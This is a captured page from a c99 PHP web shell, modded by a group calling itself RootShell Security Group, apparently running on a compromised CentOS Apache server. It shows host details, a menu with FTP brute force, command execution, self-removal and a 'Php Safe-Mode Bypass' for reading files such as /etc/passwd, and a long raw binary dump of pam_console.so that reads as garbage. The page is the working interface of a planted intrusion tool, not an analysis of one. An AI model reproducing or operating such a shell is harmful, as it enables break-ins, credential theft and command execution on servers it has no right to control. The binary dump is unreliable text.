!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/lib/security/   drwxr-xr-x
Free 52.22 GB of 127.8 GB (40.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pam_console.so (20.42 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ELF`4M4 (p:p:p:pJpJ<X:JJPtd777Qtd8H@D89:;Y۫aw=LIgO9`^s  g)<;qC
2E1Du=0&s<Be@.
|99z;"/xCoB_CMdDo2[e&-k%QZ" #
3P
<
r~
__gmon_start____cxa_finalize_Jv_RegisterClassespam_sm_setcredmallocabortpam_vsyslogcloselog__fxstat64fcntlaccessalarm__sprintf_chkstrlenpam_modutil_writepam_modutil_readlseek64__strtol_internalunlinkregexecregfreeregcompmemset__lxstat64__strncat_chkstrchrpam_modutil_getpwnam__strcpy_chkpam_sm_close_sessionpam_get_itempam_get_userstrcmppam_sm_open_sessionpam_sm_authenticategetuidpam_modutil_getpwuidregerrorpam_syslogsignalforkgetdtablesizesetgidsetuidwaitpidexecvpexitsetsidfopen64fgets__ctype_b_loccalloc__strtok_rstrcpyfcloselibpam.so.0libc.so.6__stack_chk_failpam_console.soLIBPAM_MODUTIL_1.0LIBPAM_1.0LIBPAM_EXTENSION_1.0GLIBC_2.1.3GLIBC_2.4GLIBC_2.3GLIBC_2.2GLIBC_2.3.4GLIBC_2.1GLIBC_2.0	
I@o`/hP)Usi	ii

ii
	ii
ti	ii
ii
JXK	\K
`K5pKtKxK|KKKKKK	KKK
KKKKKKKKKKKKKKKKKKK K!K"K#K$K%L&L'L(L)L*L+L,L- L.$L/(L0,L10L24L38L4<L5@L6DL7U0&hhhhh  h($h0(h8p,h@`0hHP4hP@8hX0<h` @hhDhpHhxLhPhThXh\h`hdhhhplh`phPth@xh0|h hhhhhhhh h(h0h8ph@`hHPhP@hX0h` hhhphxhhhhhhUS[<tX[ÐUVS<LuWt $d)pH9vHH9wƃL[^]ÍUS.K<tt$҃[]Ë$ÐU1]É'US;$t[]o&US$U;t
Xt(EED$ED$ED$E$2$[]
UWVSLi;lhd\ǃ\|D$|$$M}hD$D$D$DD$l$Džp<$ptp$dĬ[^_]Ë`D$<$D$hT$ED$D$D$D$l$|D$h$<$D$D$Bh$NfEfEEEEE$RU܉`T$D$<$$'JE1҉pEEdd4pt$D$D$D$p$~p$pD$p<$D$-hD$D$D$T$l$։\hD$D$D$T$l$Ĭ[^_]ËpED$p<$T$RD$D$D$<$!ЃpE$D$D$
D$qEh1$_hD$D$D$D$l$hD$‹hD$p
UWVS,I7T$TPTeE1LD$$D$D$ HD?ulDPD$D$$D$D$ƋD$G`$)<$|?t{<$HH|$D$D$T$`$t`DD$	D$$5D$T$bD$D$TD$$1Ue3[^_]ÍpD$`D$4$PT|$D$D$$D$xPt$$D$1҅%= L;TD$D$D$P$D$D$PTD$D$D$D$$1PTD$D$D$$D$w(D$D$[@Dž/devfDž/! t€Ҹ@+@D$$)ȉD$PD$@TE|$D$$D$D$@t$$D$*4P::PTD$D$D$D$$HaPTD$D$D$`$D$7@Dž/tmpDž/.X1Dž1-unDžix/Xƅ! t€uҋPDž\+@)\XD$.$[t+P9\~\\XD$D$@T$$@TE|$T$$D$D$@t$$T$lvEFPTD$D$D$ D$$4'U(])F1u։}ljT$$t@]u}]ÍD$t$D$D$<$1UWVS,0҉EUM~oEEǃXEE9EtGEE}Etϋuu!EE9EǃTuv,[^_]Ëu
$u4u
4$=wPD$t$$^ED$D$D$lD$E$-@D$ED$D$$U]MsÐ/U}}uEED$D$	<$
t	2EE<$D$ED$
Ut:u]u}]ft1ED$D$<$uEtt8tPTt$[tp$ƋE$tvpD$D$L$xED$>D$x$x1ɉ$Dž|x*t1Dž|x$yxtx$||$mD$<$ǃPD$l$[ZED$t$$tHlD$D$D$L$<$Q4$Dž|EUщ|E	t,D$|4$D$E|4$1E|ET$$BtED$<$L$D$1
x$~1dl$t狍lfD$D$D$L$<$;lD$D$D$T$<$4$fUWVSù+<}ED$D$<$CD$MUED$D$	<$t	2EEE<$D$ED$
EcD$t$D$D$<$1Uu:\T$t$D$D$<$<[^_]Ðt&:tljdfuOED$D$<$OtdD$D$D$<$뛍\8ED$D$<$D$pD$f1`EEt8tPU؉T$1҅"ED$D$EEЉ$SE$
4$D$ED$4$EEԉ$ƋE$tXD$D$ƋE4$D$EԉD$>D$~$xNE܅tGED$D$<$D$D$
ED$<$D$ED$	4$o4$EЉ$2E
D$<$	ǃP[ED$D$<$D$D$tfUWVS9(LMUE>uuEED$D$E$E8D$D$D$U$L[^_]Ít&cD$E$ED$D$D$D$U$L[^_]Ðt&ED$D$	E$uvED$ED$U$ueED$U$iED$D$D$D$E$L[^_]ÍE|D$D$D$E$L[^_]ÍEԉ$Ƌ$tGE؋D$Uԍ>T$ẺD$D$D$U؉$gED$D$E$UuEE,UЉ$)ƋE$tUE܉T$EЉD$UD$D$T$E܉$D$U؉$KxwD$U1$2E؅tE؉$E܅U܉$L[^_]Ë@D$D$(D$D$D$D$D$E$qEfD$D$D$`D$U$<U8]Yv$eE1E}}uD$D$|$$!P)ԉD$Et$t$|$$D$t$D$$9Ee3u
]u}]C	6	#U勁`u@txt&u@]]1Ðt&U]dÁ#u}ƉE#18u]ȋu}]Ëu+8tՋu08tU :t&u(Ƀ!:Bu":Bu#:BuZUWVSLrá"UЉME>EEEEt&w Ef4$t>uD$$#<-~4$9EuU܅6Et=Ẻ$H@$#yF$eUԍ$EHEЋUȋEċEЋp>+4$t&t>uɋE̋Uȉ͍t&Et&E&EED$D$$ett$$U1Ƀ~9T$UЋD$D$1}D$<$D$1ɃL[^_]ÍUT$Eĉ$q$UЋD$PD$1}<$D$D$L[^_]ƅ7D$UЋD$xEUȉ4vEUȉeet;-fLt&EEEE $vUWVS9}`u3~tvft$u~uEM$EAvu܃[^_]fU]ut@$i4$a]u]
UWVSlÉ<EueU1҉4$D$uLD$t$D$D$$IUe3j<[^_]Í`Dž&D$T$$C$ƍ@
t;D$D$D$$Dž뇍&tDžgƄD$#<$At%DA uD$$
+F)Љ$JADžDž(&D$T$$tMuT$$74$'DžDG뀋9Džu\@/<$1<T$$<$D7Džu@>Dž@y`$ÐUSnËUVSMjp@tЋu[^]ÐUS[4TY[Could not open lock file %s, disallowing console accessignoring stale lock on file %s by process %d"impossible" fstat error on open fd for %s"impossible" lseek error on %s"impossible" unlink error on %s"impossible" write error on %sno console regexes in console.handlers configchecking possible console "%s"can't find X11 socket to examine for %s probably due to X crashconsole %s is a character device%s is not a valid console device because it is owned by UID %d and the allow_nonroot flag was not setno matching console regex foundcan't find device or X11 socket to examine for %s_args_parse: handlersfile filename too long_args_parse: unknown option; %s"impossible" fstat error on %sconsole file lock already in place %sPAM_RHOST is set - not invoked from console.user '%s' unknown for this systemuser '%s' is not allowed to authenticate by pam_consoleconsole access disallowed for service %s"impossible" read error on %s%dcheck console %s^%s$console %s is owned by UID 0did not find console %sgetpwnam failed for %sdebugallow_nonroot_ttyhandlersfile=user name: %s%spam_console open_session(null)user is "%s"user "%s" is rootTTY not defined%s is console userlogin: could not obtain user nameuser with id %d not found(unknown)user %s not a console userregular expression error %slogfailwaitsetuidunlockconsoledevs 	fork failed when executing handler '%s'handler '%s' returned %d on exithandler '%s' caught a signal %dcannot open file %s for readingline too long or not ending with new line char - will be ignored;Tt t@d$D4(Lp4zR|AD
8)AB
ATQAB
DpLAB
CLAB
C ,pAB
FNEx:AB
F AB
ITFT~AB
C8AB
C XTAB
F\F|;LB
 AG
FR mAB
AG^AB
CLAAB
FP |AB
CJIUp

$1o
dK 		 o@oooJ
.>N^n~.>N^n~

.
>
N
^
n
~








.>N/etc/security/console.handlers/var/run/console//var/run/console/console.lock/etc/security/console.apps/pam_console.so.debug>`X.shstrtab.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.ctors.dtors.jcr.data.rel.ro.dynamic.got.got.plt.data.bss.gnu_debuglinko8%ox2o@@A			 J	 	 		S

N

pY``"_$1$1e@1@1\m77{0808@pJp:xJx:J:J:J:XKX;dKd;`L`<L \LLL

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--